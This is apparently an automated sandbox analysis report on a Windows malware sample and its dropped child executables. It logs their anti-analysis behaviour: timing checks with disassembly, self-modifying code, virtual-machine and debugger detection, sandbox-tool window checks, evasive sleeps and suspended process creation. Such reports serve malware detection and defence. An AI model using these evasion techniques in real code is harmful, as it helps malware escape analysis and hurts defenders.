Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 88E282 second address: 88E294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jp 00007FC3507E5376h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89539A second address: 89539E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 894B21 second address: 894B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC3507E5381h 0x0000000f popad 0x00000010 push ecx 0x00000011 jo 00007FC3507E5376h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 894B46 second address: 894B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 894F90 second address: 894FB5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC3507E5376h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FC3507E5378h 0x00000012 popad 0x00000013 js 00007FC3507E538Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007FC3507E5376h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 898917 second address: 898926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 898926 second address: 898945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jl 00007FC3507E5376h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop edi 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 898945 second address: 8989A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FC350C3E718h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 call 00007FC350C3E719h 0x00000027 jmp 00007FC350C3E71Eh 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f jnp 00007FC350C3E716h 0x00000035 jmp 00007FC350C3E728h 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 8989A9 second address: 8989DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jns 00007FC3507E538Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 je 00007FC3507E5380h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 8989DF second address: 8989FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E71Fh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 898C9B second address: 898CA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 898CA1 second address: 898CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC350C3E716h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 899565 second address: 89956B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89956B second address: 89956F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89956F second address: 899585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b mov si, FEF0h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 899585 second address: 899598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 899A89 second address: 899AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89A009 second address: 89A00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89A744 second address: 89A748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89A748 second address: 89A74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89C3EC second address: 89C3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E537Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89DD8C second address: 89DD90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Special instruction interceptor: First address: 50EB0F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Special instruction interceptor: First address: 6ADC6A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Special instruction interceptor: First address: 50EAC7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Special instruction interceptor: First address: 7395EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 6EEB0F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 88DC6A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 6EEAC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 9195EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Special instruction interceptor: First address: 942047 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Special instruction interceptor: First address: 940858 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Special instruction interceptor: First address: 9D7FD4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 4F2047 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 4F0858 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 587FD4 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Code function: 1_2_055200F4 rdtsc

1_2_055200F4

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1333	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1694	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1177	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1104	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1085	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1179	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1145	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Or1ARiR[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ssisd.sys	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8336	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8336	Thread sleep time: -64032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8308	Thread sleep count: 1333 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8308	Thread sleep time: -2667333s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8332	Thread sleep count: 274 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8332	Thread sleep time: -548274s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8296	Thread sleep count: 173 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8296	Thread sleep time: -5190000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8532	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328	Thread sleep count: 1694 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328	Thread sleep time: -3389694s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328	Thread sleep time: -70035s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8320	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8320	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 604	Thread sleep count: 1177 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 604	Thread sleep time: -2355177s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1652	Thread sleep count: 1104 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1652	Thread sleep time: -2209104s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1364	Thread sleep count: 1085 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1364	Thread sleep time: -2171085s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1156	Thread sleep count: 1179 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1156	Thread sleep time: -2359179s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1936	Thread sleep count: 213 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1936	Thread sleep time: -6390000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3432	Thread sleep count: 1145 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3432	Thread sleep time: -2291145s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\22.exe TID: 4056	Thread sleep count: 332 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SUAosT64HD.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: rapes.exe, rapes.exe, 00000008.00000002.1534686061.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, axplong.exe, 0000000A.00000002.1854681754.000000000086E000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 0000000B.00000002.2559913702.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: apple.exe, 0000000E.00000002.1931013800.0000000006DF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22
Source: 22.exe, 00000013.00000002.2064569844.0000000000748000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWQ
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2565136945.0000000000E99000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2565136945.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW H
Source: SUAosT64HD.exe, 00000001.00000002.1365221436.000000000068E000.00000040.00000001.01000000.00000004.sdmp, axplong.exe, 00000002.00000002.2561109533.000000000086E000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.1437821741.000000000086E000.00000040.00000001.01000000.00000007.sdmp, 3d9778a1ff.exe, 00000004.00000002.1486447124.000000000091D000.00000040.00000001.01000000.00000009.sdmp, rapes.exe, 00000007.00000002.1535218979.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 00000008.00000002.1534686061.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 0000000A.00000002.1854681754.000000000086E000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 0000000B.00000002.2559913702.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\SUAosT64HD.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Code function: 1_2_055200F4 rdtsc

1_2_055200F4

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004D645B mov eax, dword ptr fs:[00000030h]	1_2_004D645B
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004DA1C2 mov eax, dword ptr fs:[00000030h]	1_2_004DA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006BA1C2 mov eax, dword ptr fs:[00000030h]	2_2_006BA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006B645B mov eax, dword ptr fs:[00000030h]	2_2_006B645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006BA1C2 mov eax, dword ptr fs:[00000030h]	3_2_006BA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006B645B mov eax, dword ptr fs:[00000030h]	3_2_006B645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006BA1C2 mov eax, dword ptr fs:[00000030h]	10_2_006BA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006B645B mov eax, dword ptr fs:[00000030h]	10_2_006B645B

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe "C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe"	Jump to behavior
